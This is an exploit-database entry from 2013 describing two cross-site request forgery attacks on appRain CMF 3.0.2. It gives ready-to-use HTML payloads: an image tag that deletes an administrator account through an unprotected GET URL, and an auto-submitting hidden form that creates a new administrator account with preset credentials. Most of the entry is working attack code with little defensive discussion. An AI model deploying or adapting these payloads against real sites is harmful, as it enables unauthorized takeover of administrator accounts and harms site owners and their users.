appRain CMF 3.0.2 - CSRF Add/Delete Admin Account Vulnerability

2013-08-29T00:00:00
ID 1337DAY-ID-21174
Type zdt
Reporter yashar shahinzadeh
Modified 2013-08-29T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ###################################################################################################################################
# Exploit Title: Apprain CMF / CSRF ADD/DELETE administrator's account
# Date: 2013 29 August
# Exploit Author: Yashar shahinzadeh
# Special thanks to Mormoroth
# Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir
# Vendor Homepage: http://www.apprain.com/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version :  3.0.2
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir }
###################################################################################################################################
 
Summary:
========
1. CSRF - Delete a account
2. CSRF - Adding administrator's account
 
1. CSRF - Delete a account:
===========================
Deleting account section isn't protected against CSRF attacks, it's a simple get, the following exploit is useful to conduct an attack, albeit [ID] must be replaced by administrator's ID (e.g. 2)
 
<img src="http://localhost//appRain-v-3.0.2/common/delete_row/Admin/[ID]" width="1" height="1">
 
 
2. CSRF - Adding administrator's account:
=========================================
<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
                action="http://localhost/appRain-v-3.0.2/admin/manage/add" method="post">
                <input type="hidden" name="data[Admin][f_name]" value="yashar">
                <input type="hidden" name="data[Admin][l_name]" value="shahinzadeh">
                <input type="hidden" name="data[Admin][email]" value="[email protected]">
                <input type="hidden" name="data[Admin][username]" value="yashar">
                <input type="hidden" name="data[Admin][password]" value="Yashar123">
                <input type="hidden" name="data[Admin][status]" value="Active">
                <input type="hidden" name="data[Admin][description]" value="">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>
 
 
/** Yasshar shahinzadeh **/

#  0day.today [2018-03-14]  #